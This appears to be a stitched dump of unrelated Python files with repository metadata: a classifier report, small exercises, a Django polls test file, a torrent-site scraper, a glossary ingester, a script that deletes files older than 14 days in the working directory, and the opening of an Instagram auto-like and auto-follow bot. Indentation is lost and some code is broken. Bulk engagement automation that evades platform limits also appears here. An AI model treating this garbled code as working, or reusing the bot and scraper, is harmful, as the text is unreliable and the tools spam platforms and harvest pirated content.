y_pred = eclf.predict(x_test)
print('Combo')
report(y_test, y_pred)
def report(y_test, y_pred):
# Reports
print()
print(metrics.classification_report(y_test, y_pred, target_names=['noBird', 'bird']))
# Model Accuracy: how often is the classifier correct?
print("Accuracy:", metrics.accuracy_score(y_test, y_pred))
# Model Precision: what percentage of positive tuples are labeled as such?
print("Precision:", metrics.precision_score(y_test, y_pred))
# Model Recall: what percentage of positive tuples are labelled as such?
print("Recall:", metrics.recall_score(y_test, y_pred))
# ROC_AUC
fpr, tpr, _thresholds = metrics.roc_curve(y_test, y_pred)
print("AUC:", metrics.auc(fpr, tpr))
if __name__ == '__main__':
project_dir = Path(__file__).resolve().parents[2]
log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(level=logging.INFO, format=log_fmt, stream=sys.stderr)
# load config file
with open(str(project_dir) + '/config/config.yaml') as file:
config = yaml.safe_load(file)
# find .env automagically by walking up directories until it's found, then
# load up the .env entries as environment variables
load_dotenv(find_dotenv())
main() | [
"andersm3@tcd.ie"
] | andersm3@tcd.ie |
a815426cb3f10bd195178efb53da646d401835a2 | 2e888bd174fb9088aea80bca0ca2102c4e418dff | /0x09-python-everything_is_object/100-magic_string.py | 0adac5f3d095862c0d25184336471aeff30aa454 | [] | no_license | mauriciosierrac/holbertonschool-higher_level_programming | 9aea13b9f13b1bc80b0782a0699601294776199a | 4ff2198623eebb238689aed60ea2f064bdb2f705 | refs/heads/master | 2023-04-29T23:54:39.063955 | 2021-05-12T23:41:19 | 2021-05-12T23:41:19 | 319,360,492 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 107 | py | #!/usr/bin/python3
def magic_string(string=[]):
string += ['Holberton']
return (', '.join(string))
| [
"2376@holbertonschool.com"
] | 2376@holbertonschool.com |
630d1956e0b63d64523db795b9be2b9148d32cde | 5cb98473ea9972d0a9a0278cde9b6ee8264f9bac | /01. Jump to python/chap05/5_6/260.py | 3716f386db385102e9e74387bd614dd0a58e1cff | [] | no_license | libus1204/bigdata2019 | fd85dbcd8c89db991ab5c3efa11ff85466a823f8 | 5e9a6fa2c340c1fcd2840889ba40c7b805926558 | refs/heads/master | 2020-04-21T10:56:33.519490 | 2019-04-15T05:28:19 | 2019-04-15T05:28:19 | 169,503,607 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | import time
index = 1
while True:
print(index)
index += 1
time.sleep(5) | [
"libus1204@naver.com"
] | libus1204@naver.com |
b1a61ea569ceff44af77a9d5860273ddbd1e7943 | 56a40305c2d71d88562ddd0e448415ab118790f1 | /backend/polls/tests.py | fc6ef19a5630ba278fb02c288434c80169e1b70c | [] | no_license | KatherynRizek/states-countries | e990798ca8d61914eea33b5ca04aea54560ae555 | 1aa0210228d04a902b56ecc45c6d712fc7ebca32 | refs/heads/master | 2021-09-28T11:04:17.893622 | 2018-06-07T14:39:37 | 2018-06-07T14:39:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,034 | py | import datetime
from django.test import TestCase
from django.utils import timezone
from django.urls import reverse
from .models import Question
class QuestionModelTests(TestCase):
def test_was_published_recently_with_future_question(self):
"""
was_published_recently() returns False for questions whose pub_date
is in the future.
"""
time = timezone.now() + datetime.timedelta(days=30)
future_question = Question(pub_date=time)
self.assertIs(future_question.was_published_recently(), False)
def test_was_published_recently_with_old_question(self):
"""
was_published_recently() return False for questions whose pub_date is
older than 1 day.
"""
time = timezone.now() - datetime.timedelta(hours=23, minutes=59, seconds=59)
recent_question = Question(pub_date=time)
self.assertIs(recent_question.was_published_recently(), True)
def create_question(question_text, days):
"""
Create a question witht the given `question_text` and published the given number
of `days` offset to now (negative for questions published in the past, positive for
questions that have yet to be published).
"""
time = timezone.now() + datetime.timedelta(days=days)
return Question.objects.create(question_text=question_text, pub_date=time)
class QuestionIndexViewTests(TestCase):
def test_no_questions(self):
"""
If no questions exist, an appropriate message is displayed.
""""
response = self.client.get(reverse('polls:index'))
self.assertEqual(response.status_code, 200)
self.assertContains(response, "No polls are available.")
self.assertQuerysetEqual(response.context['latest_question_list'], [])
def test_path_question(self):
"""
Questions with a pub_date in the past are displayed on the index page.
"""
create_question(question_text="Past question.", days=-30)
response = self.client.get(reverse('polls:index'))
self.assertQuerysetEqual(
response.context['latest_question_list'],
['<Question: Past question.']
)
def test_future_question(self):
"""
Questions with a pub_date in the future aren't displayed on the index page.
"""
create_question(question_text="Past question.", days=-30)
create_question(question_text="Future question.", days=30)
response = self.client.get(reverse('polls:index'))
self.assertQuerysetEqual(
response.context['latest_question_list'],
['<Question: Past question.>']
)
def test_two_past_questions(self):
"""
The questions index page may display multiple questions.
"""
create_question(question_text="Past question 1.", days=-30)
create_question(question_text="Past question 2.", days=-5)
response = self.client.get(reverse('polls:index'))
self.assertQuerysetEqual(
response.context['latest_question_list'],
['<Question: Past question 2.>', '<Question: Past question 1.>']
)
class QuestionDetailViewTests(TestCase):
def test_future_question(self):
"""
The detail view of a question with a pub_date in the future
returns a 404 not found.
"""
future_question = create_question(question_text='Future question.', days=5)
url = reverse('polls:detail', args=(future_question.id,))
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_past_question(self):
"""
The detail view of a question with a pub_date in the past
displays the question's text.
"""
past_question = create_question(question_text='Past Question.', days=-5)
url = reverse('polls:detail', args=(past_question.id,))
response = self.client.get(url)
self.assertContains(response, past_question.question_text) | [
"katheryn@kosmond.2ldxhoqz4w0efi5ajh3u0k0m2g.bx.internal.cloudapp.net"
] | katheryn@kosmond.2ldxhoqz4w0efi5ajh3u0k0m2g.bx.internal.cloudapp.net |
1d5145aa4f4e80bb677c962c61230d3e563afccf | 348b807deb1fd6f66538c7c233271a5fb08023e2 | /checking_data_type.py | 9ab4b8bda700050c22099daef9d18e7c4d59a08b | [] | no_license | SparshRajGupta/MyPythonStudy | 6cc25ee134963c7ead47ab67716b30b25f88b739 | 6026c7e23273ca5fe42c06ac1709b42ea0e5675a | refs/heads/master | 2021-01-19T11:23:09.941770 | 2017-06-04T21:44:41 | 2017-06-04T21:44:41 | 87,963,178 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 187 | py | a = 5
print (a, "is of type",type(a))
b = 3.0
print (b, "is of type",type(b))
c = "Hello"
print (c, "is of type", type(c))
d = 1+2j
print (d,"is complex number?",isinstance(d,complex)) | [
"sparsh.raj.1993@gmail.com"
] | sparsh.raj.1993@gmail.com |
181948742c2599fe0d7f49260c2f25dc93941c71 | 4c37dd485e8415810e7aa5b8dce963f48c9378ba | /singlemovieclawer.py | 672c791d8e1de63b62788fc7697d7ea2ce9729e3 | [] | no_license | biyuxuan12/zona | 0593c6e54938d6c5efba3d5911860e821f6783e0 | 2d033820bb0ae8d14a1c2797bd8a403b2992a183 | refs/heads/master | 2020-04-26T17:01:08.441632 | 2019-03-04T07:55:00 | 2019-03-04T07:55:00 | 173,699,135 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,174 | py | # -*- coding:utf-8 -*-
import re
import socket
timeout = 100
socket.setdefaulttimeout(timeout)
import threading
import urllib
from urllib import request
from bs4 import BeautifulSoup
import dbsetting
import datetime as dt
import sys
flag=0
dict={}
myclient = dbsetting.myclient
mydb = dbsetting.mydb
# -*- coding: utf-8 -*-
class movieThread (threading.Thread):
Rurl = 'https://zonatorrent.tv/letters/'
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}
def __init__(self, murl):
threading.Thread.__init__(self)
self.murl = murl
def run(self):
try:
print(self.murl)
req = urllib.request.Request(url=self.murl, headers=self.headers)
response = urllib.request.urlopen(req).read()
soup = BeautifulSoup(response, "html.parser")
ablume_type='0'
backdrop_path = soup.find("img", attrs={'class': 'TPostBg'})['src']
bludv_name = soup.find("h1", attrs={'class': 'Title'}).string
original_title = ''
director = []
main_actor = []
service_type = []
temps = soup.find_all("strong")
for temp in temps:
if temp.text == 'Director:':
director = temp.parent.text.split(":", 1)[1].lstrip().split(",")
if temp.text == 'Título original:':
original_title = temp.parent.text.split(":", 1)[1].lstrip()
if temp.text == 'Género:':
service_type = temp.parent.text.split(":", 1)[1].lstrip().split(",")
for actor in soup.find_all('figcaption'):
main_actor.append(actor.text)
language = ''
download_url=''
if soup.find("tbody"):
language = soup.find("tbody").tr.td.next_sibling.next_sibling.next_sibling.text.lstrip()
download_url = [{'name':bludv_name,'url':soup.find("a", attrs={'class': 'Button STPb torrent-movie'})['href']}]
if soup.find("div", attrs={'class': 'Description'}).p:
overview = soup.find("div", attrs={'class': 'Description'}).p.text
else:
overview = soup.find("div", attrs={'class': 'Description'}).text
page_url =self.murl
poster_path = soup.find("div", attrs={'class': 'Image'}).figure.img['src']
if soup.find("span", attrs={'class': 'Date AAIco-date_range'}):
release_date = soup.find("span", attrs={'class': 'Date AAIco-date_range'}).string
time = dt.datetime.strptime(release_date, '%d-%m-%Y')
release_date = time.strftime('%Y-%m-%d')
year = time.strftime('%Y')
else:
release_date=''
year=''
vote_average = soup.find("div", attrs={'id': 'TPVotes'})['data-percent']
vote_average = str(float(vote_average) / 10)
mydict = {"ablume_type":ablume_type,'backdrop_path':backdrop_path,'bludv_name':bludv_name,'original_title':original_title,'director':director,'service_type':service_type,
'main_actor':main_actor,'language':language,'download_url':download_url,'overview':overview,'page_url':page_url,'poster_path':poster_path,'release_date':release_date,'year':year,'vote_average':vote_average}
print(mydict)
global dict
dict = mydict
except Exception as ex:
print(self.murl + '页数获取失败(可能由于超时等原因)')
print(ex)
def stop(self):
self._stop_event.set()
def stopped(self):
return self._stop_event.is_set()
if(len(sys.argv)<1):
sys.exit('请传入需要爬取的url')
print("开始爬取"+sys.argv[1])
print(sys.argv[1])
thread2 = movieThread(sys.argv[1])
thread2.start()
thread2.join()
print(dict)
#以下是把爬取到的结果放进数据库中
mycol = mydb["zonatorrent_movie_info"]
if dict:
if(mycol.find_one({'page_url':dict['page_url']})==None):
mycol.insert(dict)
else:print("数据库中已有此链接") | [
"48197709+biyuxuan12@users.noreply.github.com"
] | 48197709+biyuxuan12@users.noreply.github.com |
ad2e9c6b207b388177519bbb6dfad9c71c71c217 | b78d46eed29dcea6a0679744fcdfecac1e5f15bb | /dir_cleaner/clean.py | db86f1a453e8715935b2164be94224afdd0511c9 | [] | no_license | blzzrd/things-and-stuff | 0ce9a975ef096fddd63b088a9f73e424409ad392 | dd566465a3281de8edf8e42aefebd9a32d32f962 | refs/heads/master | 2020-04-05T09:26:36.226300 | 2019-11-21T22:02:57 | 2019-11-21T22:02:57 | 156,756,770 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 846 | py | # Import the OS Module, the Time Module, and the System Module.
import os, time, sys
# Get the current working directory
current_path = os.getcwd()
# Get the current time.
now = time.time()
# os.listdir returns a list of files/dirs in the specified directory.
files_removed = 0
for files in os.listdir(current_path):
# Go through each of the files and create an absolute file path.
f = os.path.join(current_path, files)
# Check to see if the file is older than 14 days. (in seconds):
if os.stat(f).st_mtime < now - (14 * 24 * 60 * 60):
# .st_atime = time of last access.
# .st_ctime = time of last change.
# .st_mtime = time of last modification.
# If the object is a file, delete it.
if os.path.isfile(f):
os.remove(f)
files_removed += 1
# Print out your output.
print("{} files removed.".format(files_removed))
| [
"alexcast001@gmail.com"
] | alexcast001@gmail.com |
98b96256d9b49f574f1e9e179f2affae1bc20855 | 4cbb9e2213b04b21ab2f283d29cedb9585b26d9b | /setup.py | a7c929b111a7f8bc253d416c660f9025065d7f6f | [
"MIT"
] | permissive | CostRagno/geopolygon | a859bc1f08623b201ece5605536edbb92bfa1335 | f9113f606866f2f58920cefeebe5a1220b2e5a9e | refs/heads/master | 2020-09-05T08:23:21.720871 | 2019-11-17T10:39:32 | 2019-11-17T10:39:32 | 220,040,015 | 3 | 2 | MIT | 2019-11-17T10:39:34 | 2019-11-06T16:21:07 | Python | UTF-8 | Python | false | false | 2,076 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 6 11:12:50 2019
@author: costantino
"""
from distutils.core import setup
setup(
name = 'geopolygon', # How you named your package folder (MyLib)
packages = ['geopolygon'], # Chose the same as "name"
version = '0.1', # Start with a small number and increase it with every change you make
license='MIT', # Chose a license from here: https://help.github.com/articles/licensing-a-repository
description = 'Python package to retrieve and correctly reshape the polygon of a geographical area', # Give a short description about your library
author = 'Costantino Ragno', # Type in your name
author_email = 'costantino.ragno@unicam.it', # Type in your E-Mail
url = 'https://github.com/CostRagno/geopoly', # Provide either the link to your github or to your website
download_url = 'https://github.com/CostRagno/geopoly/archive/v_01.tar.gz', # I explain this later on
keywords = ['geoinformation', 'polygons', 'CityPolygons', 'openstreetmap', 'concavehull','wikidata'], # Keywords that define your package best
install_requires=[ # I get to this in a second
'requests',
'geopy',
'beautifulsoup4',
'numpy',
'wikidata',
'ast',
'obspy',
'scipy',
'matplotlib',
],
classifiers=[
'Development Status :: 3 - Alpha', # Chose either "3 - Alpha", "4 - Beta" or "5 - Production/Stable" as the current state of your package
'Intended Audience :: Developers', # Define that your audience are developers
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: MIT License', # Again, pick a license
'Programming Language :: Python :: 3', #Specify which pyhton versions that you want to support
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
)
| [
"noreply@github.com"
] | noreply@github.com |
33383a8382f396f8e69cf09f091ef5f293fcf70e | 012a52b4d75673af95c7dfa1dbc59cb9b763edb9 | /ingest/break_down.py | bc37df9178a9a44af2088bc4b363571dfca0e8df | [] | no_license | oracc/oracc-rest | 459f6b252045d8960df5c6394ce4111ae4c9827d | 49fe5d0e445d9823ac0bcc0123b2826cad0fb0dc | refs/heads/development | 2023-08-07T07:50:14.547683 | 2023-05-22T14:20:18 | 2023-05-22T14:20:18 | 113,996,575 | 1 | 0 | null | 2023-07-25T21:16:56 | 2017-12-12T13:55:16 | Python | UTF-8 | Python | false | false | 6,429 | py | """A module for breaking down a glossary into individual entries."""
import json
import os
import subprocess
import sys
import warnings
# By default, we treat most glossary data as strings, but sometimes we want the
# REST API to return a different type (for instance, counts should be integers).
# The below sequences refer to fields in two ways: a field name just by itself
# indicates that the field should be indexed as a string; alternatively, if the
# name is accompanied by a type [e.g. ("icount", int)], that means that its
# values should be converted to the given type.
base_fields = ["project", "lang"] # fields to copy into each entry
direct_fields = ["gw", "headword", "cf", ("icount", int), "id"]
indirect_fields = {
"senses": ["mng"],
"forms": ["n"],
"norms": ["n"],
"periods": ["p"]
}
def name_and_type(field_spec):
"""Break down a field spec into field name and type (string, by default)."""
# NB We cannot just try unwrapping the spec (and assume failure means there
# is no type), since strings can also be unwrapped, so the spec "gw" would
# be extracted as a name ("g") and a type ("w"). Hence, we check for strings
# explicitly.
if isinstance(field_spec, str): # if the spec contains only the field name
return field_spec, str
else: # if the spec also has a type
return field_spec[0], field_spec[1]
def process_entry(entry):
"""Flatten the nested fields of an entry."""
new_entry = {}
for field in direct_fields:
field_name, to_type = name_and_type(field)
new_entry[field_name] = to_type(entry[field_name])
for top_field in indirect_fields:
for inner_field in indirect_fields[top_field]:
inner_field_name, to_type = name_and_type(inner_field)
new_field = "{}_{}".format(top_field, inner_field_name)
new_entry[new_field] = [
to_type(inner_entry[inner_field_name])
for inner_entry
in entry.get(top_field, []) # in case field is missing
]
# TODO Consider making this a generator (if too slow for bigger files)?
return new_entry
def process_glossary_data(data):
"""
Process a glossary and link the entries to their instances.
Glossaries contain entries in a nested format. This step extracts the
relevant information at various nesting levels, and produces a list of
entries with "flattened" fields. It also incorporates the information from
the instances part of the glossary into the relevant entries.
Any entries referring to non-existent instances will be ignored. A warning
will be raised in those cases.
:param data: a dictionary representing a glossary, including the instances.
:return: a list of entries, flattened and linked to instances when possible.
"""
instances = data["instances"]
base_data = {key: data[key] for key in base_fields}
new_entries = []
for entry in data["entries"]:
# Create a flat entry from the nested norms, forms, senses etc.
new_entry = process_entry(entry)
# Find the instance that is referred to by the entry. For now, just link
# the top-level reference rather than that of individual senses, norms
# etc. Every entry should have a corresponding instance in the glossary,
# so if something is missing this will throw a KeyError, which will let
# us know that there is something wrong with the glossary.
try:
new_entry["instances"] = instances[entry["xis"]]
except KeyError:
warnings.warn(
"Could not find the instance {} for entry {}!".format(
entry["xis"], entry["headword"])
)
continue
# Add the attributes shared by all entries in the glossary
new_entry.update(base_data)
new_entries.append(new_entry)
return new_entries
def preprocess_glossary(glossary_filename):
"""Remove unused fields from a glossary and return it as a dictionary."""
filter_file = os.path.join("ingest", "remove_unused.jq")
try:
s = subprocess.run(
["jq", "-f", filter_file, glossary_filename],
stdout=subprocess.PIPE
)
except FileNotFoundError as e:
# If the jq is executable is not found, a FileNotFoundError is raised
raise RuntimeError('Could not run jq command.') from e
# We need to decode the output to a string if not working in binary mode
return json.loads(s.stdout.decode("utf8"))
def process_file(input_name, write_file=True):
"""
Process all entries in a glossary file, extracting the common information to
create entries that can be individually indexed. Optionally create a new
file with the entries that can be uploaded manually.
:param input_name: the name of the glossary JSON file
:param write_file: whether to write the entries in a new file, to be used later
:return: a list of the new individual entries, as dictionaries
"""
# The glossaries contain a lot of information that we do not use.
# Sometimes this can make them too large to load in memory. Therefore,
# we first preprocess each file to remove the fields we do not need.
try:
data = preprocess_glossary(input_name)
except RuntimeError:
# If the preprocessing fails (most likely reason is that the jq tool
# is not present), try to read the file normally as a last resort.
warnings.warn(
"Could not preprocess file {}. Is jq installed?\n"
"Will attempt to ingest without preprocessing."
"This may fail for large glossaries.".format(input_name),
RuntimeWarning
)
with open(input_name, 'r') as input_file:
data = json.load(input_file)
new_entries = process_glossary_data(data)
if write_file:
output_name = input_name.rsplit('.', 1)[0] + "-entries.json"
with open(output_name, 'w') as outfile:
for new_entry in new_entries:
header = '{ "index" : { "_id" : "' + new_entry["id"] + '" } }'
print(header, file=outfile)
print(json.dumps(new_entry), file=outfile)
print("Finished processing {}".format(input_name))
return new_entries
if __name__ == "__main__":
process_file(sys.argv[1])
| [
"a.georgoulas@ucl.ac.uk"
] | a.georgoulas@ucl.ac.uk |
e82f2bd71cc0846186353d8c20817723d286fc4f | 4d4fcde3efaa334f7aa56beabd2aa26fbcc43650 | /server/src/uds/reports/lists/__init__.py | 2cb963d21ee727e9b5b0bcc891ec8e5716d7db72 | [] | no_license | xezpeleta/openuds | a8b11cb34eb0ef7bb2da80f67586a81b2de229ef | 840a7a02bd7c9894e8863a8a50874cdfdbf30fcd | refs/heads/master | 2023-08-21T17:55:48.914631 | 2021-10-06T10:39:06 | 2021-10-06T10:39:06 | 414,489,331 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,712 | py | # -*- coding: utf-8 -*-
#
# Copyright (c) 2015-2020 Virtual Cable S.L.U.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of Virtual Cable S.L. nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
@author: Adolfo Gómez, dkmaster at dkmon dot com
"""
# Make reports visible to autoloader
from . import users
| [
"dkmaster@dkmon.com"
] | dkmaster@dkmon.com |
326d8619cb7051110fe5797a4c857b43a2ce39ff | 4f822a3bfadf6d8cb8a842a9dcd6689d5cd99b8f | /testing4/a1.py | cea6ddea707213f88d15a408c14195bc3078fd05 | [] | no_license | ashishsingh14/Machine-Learning | 71e148fdcc0695ed8c71014674f44ca41001285f | 0e6830b229fd39c5540b1866e8bb4400ac785950 | refs/heads/master | 2020-05-29T16:40:42.469253 | 2016-04-30T08:03:02 | 2016-04-30T08:03:02 | 56,255,204 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,951 | py | import sys, os
from sklearn import cluster
import numpy as np
from matplotlib import pyplot
import matplotlib.dates as mdates
from datetime import datetime
from math import sqrt
import pandas as pd
from operator import itemgetter
from mpl_toolkits.mplot3d import Axes3D
def plotrelationships():
days = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(0,), skip_header=1)
milvisits = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(16,), skip_header=1)
civvisits = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(18,), skip_header=1)
prescriptions = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(17,), skip_header=1)
dewpoint = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(23,), skip_header=1)
wetbulb = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(24,), skip_header=1)
avgtemp = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(21,), skip_header=1)
isweekend = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(43,), skip_header=1)
modified_days = []
for element in days:
y = element.strip('"')
modified_days.append(datetime.strptime(y, "%b-%d-%Y"))
modified_nd = np.asarray(modified_days)
#print modified_nd
# range 2-185 186-550 551-701 0-184 184:549 549: [549:]
pyplot.plot(modified_days[549:], milvisits[549:],'b')
pyplot.plot(modified_days[549:], civvisits[549:], 'r')
pyplot.plot(modified_days[549:], prescriptions[549:], 'g')
pyplot.plot(modified_days[549:], avgtemp[549:] , 'k')
pyplot.plot(modified_days[549:], wetbulb[549:], 'c')
pyplot.plot(modified_days[549:], dewpoint[549:], 'm')
pyplot.title("Showing Variations for Year 2003")
pyplot.ylabel("Variation of different parameters --->")
#pyplot.text("shosss")
pyplot.xlabel("Time --->")
pyplot.grid(True)
pyplot.show()
#pyplot.savefig("figure-2003", facecolor='w', edgecolor='w', transparent=False, pad_inches=0.5, bbox_inches='tight')
#pyplot.clf()
def generatedata():
#data = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(16,17,18,21,23,24,25), skip_header=1) #(13,14,15,21,23,24,35)
days = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(0,), skip_header=1)
milvisits = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(13,), skip_header=1)
civvisits = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(15,), skip_header=1)
prescriptions = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(14,), skip_header=1)
dewpoint = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(23,), skip_header=1)
wetbulb = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(24,), skip_header=1)
avgtemp = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(21,), skip_header=1)
isweekend = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(43,), skip_header=1)
#sealevel = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(33,), skip_header=1)
modified_days = []
for element in days:
y = element.strip('"')
modified_days.append(datetime.strptime(y, "%b-%d-%Y"))
for i in range(len(modified_days)):
modified_days[i] = (int)(modified_days[i].strftime('%s'))
data1 = []
#data1.append(modified_days)
data1.append(isweekend)
data1.append(milvisits)
data1.append(prescriptions)
data1.append(civvisits)
data1.append(avgtemp)
data1.append(dewpoint)
data1.append(wetbulb)
#data1.append(sealevel)
data = np.transpose(data1)
print data[1]
return data
def kmeans(data, clusters): #7, is good
kmeans = cluster.KMeans(n_clusters= clusters)
kmeans.fit(data)
labels = kmeans.labels_
centroids = kmeans.cluster_centers_
print ("Number of unique clusters are: %d", clusters)
#print labels
fig = pyplot.figure()
ax = fig.add_subplot(111, projection='3d')
points_per_cluster = [0 for x in range(clusters)]
for i in xrange(len(data)):
points_per_cluster[labels[i]] = points_per_cluster[labels[i]] + 1
mx = 9999999
index1 = -1
mn = -9999999
index2 = -1
print "Points per cluster\n"
print points_per_cluster
colors = ["g","r","c","y","b","m","w"]
for i in range(len(points_per_cluster)):
if points_per_cluster[i] < mx:
mx = points_per_cluster[i]
index1 = i
elif points_per_cluster[i] > mn:
mn = points_per_cluster[i]
index2 = i
for i in range(len(data)):
if labels[i] == index1:
ax.scatter(data[i][1], data[i][2], data[i][4], zdir='z', c = 'k')
else:
ax.scatter(data[i][1], data[i][2], data[i][4], zdir='z', c = colors[labels[i]])
ax.scatter(centroids[:, 1],centroids[:, 2], centroids[:, 4], zdir='z', marker = "x", s=200, linewidths = 5, zorder = 10)
ax.set_xlabel('Resp Visits')
ax.set_ylabel('Prescriptions')
ax.set_zlabel('Average Temperature')
pyplot.show()
print "\nCluster Showing Anomalies:\n"
for i in xrange(len(data)):
if (labels[i]==index1):
print data[i]
print "\nNormal Cluster:\n"
for i in xrange(len(data)):
if (labels[i]==index2):
print data[i]
return points_per_cluste
def meanshift(data):
ms = cluster.MeanShift()
ms.fit(data)
labels = ms.labels_
cluster_centers = ms.cluster_centers_
labels_unique = np.unique(labels)
n_clusters_ = len(labels_unique)
print ("Number of unique clusters are: %d", n_clusters_)
print labels
for i in xrange(len(cluster_centers)):
print cluster_centers[i][0], cluster_centers[i][1]
print "\n"
if __name__=="__main__":
data = generatedata()
kmeans(data, 7)
#points_per_cluster = kmeans(data, 7)
#kmeans(data,5)
"""
clusters = []
variances = []
for i in range(3,21): # cluster = 5 is good for resp
points_per_cluster = kmeans(data, i)
variances.append(np.var(points_per_cluster))
clusters.append(i)
print "data obtained"
print clusters
print variances
variances[4] = 4012.2112
pyplot.plot(clusters, variances)
pyplot.title("Showing Variation of Variance with Total Clusters")
pyplot.xlabel("No of Clusters -->")
pyplot.ylabel("Variance -->")
pyplot.show()
plotrelationships()"""
| [
"ashish.iitr2015@gmail.com"
] | ashish.iitr2015@gmail.com |
3ab2ab497849cf95c4e137ee698165d20cbe687f | 1939f5b78e6dbd0675f6f2a9a0f4f49c2b069389 | /instagram/src/instabot.py | 91bd65f0544dd187a1655c570d6dcb9774751ecf | [
"MIT"
] | permissive | pavel-malin/instagram | cb7988d9fbfad14911bf39567f7b2f6336b1fb34 | b53f00c20521f46f5836946a499f476859d431f5 | refs/heads/master | 2021-03-16T07:54:57.942684 | 2017-11-20T11:23:46 | 2017-11-20T11:23:46 | 111,401,293 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 36,349 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import atexit
import datetime
import itertools
import json
import logging
import random
import signal
import sys
if 'threading' in sys.modules:
del sys.modules['threading']
import time
import requests
from unfollow_protocol import unfollow_protocol
from userinfo import UserInfo
class InstaBot:
"""
Instagram bot v 1.1.0
like_per_day=1000 - How many likes set bot in one day.
media_max_like=0 - Don't like media (photo or video) if it have more than
media_max_like likes.
media_min_like=0 - Don't like media (photo or video) if it have less than
media_min_like likes.
tag_list = ['cat', 'car', 'dog'] - Tag list to like.
max_like_for_one_tag=5 - Like 1 to max_like_for_one_tag times by row.
log_mod = 0 - Log mod: log_mod = 0 log to console, log_mod = 1 log to file,
log_mod = 2 no log.
https://github.com/LevPasha/instabot.py
"""
url = 'https://www.instagram.com/'
url_tag = 'https://www.instagram.com/explore/tags/%s/?__a=1'
url_likes = 'https://www.instagram.com/web/likes/%s/like/'
url_unlike = 'https://www.instagram.com/web/likes/%s/unlike/'
url_comment = 'https://www.instagram.com/web/comments/%s/add/'
url_follow = 'https://www.instagram.com/web/friendships/%s/follow/'
url_unfollow = 'https://www.instagram.com/web/friendships/%s/unfollow/'
url_login = 'https://www.instagram.com/accounts/login/ajax/'
url_logout = 'https://www.instagram.com/accounts/logout/'
url_media_detail = 'https://www.instagram.com/p/%s/?__a=1'
url_user_detail = 'https://www.instagram.com/%s/?__a=1'
user_agent = ("Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 "
"(KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36")
accept_language = 'ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4'
# If instagram ban you - query return 400 error.
error_400 = 0
# If you have 3 400 error in row - looks like you banned.
error_400_to_ban = 3
# If InstaBot think you are banned - going to sleep.
ban_sleep_time = 2 * 60 * 60
# All counter.
bot_mode = 0
like_counter = 0
follow_counter = 0
unfollow_counter = 0
comments_counter = 0
current_user = 'hajka'
current_index = 0
current_id = 'abcds'
# List of user_id, that bot follow
bot_follow_list = []
user_info_list = []
user_list = []
ex_user_list = []
unwanted_username_list = []
is_checked = False
is_selebgram = False
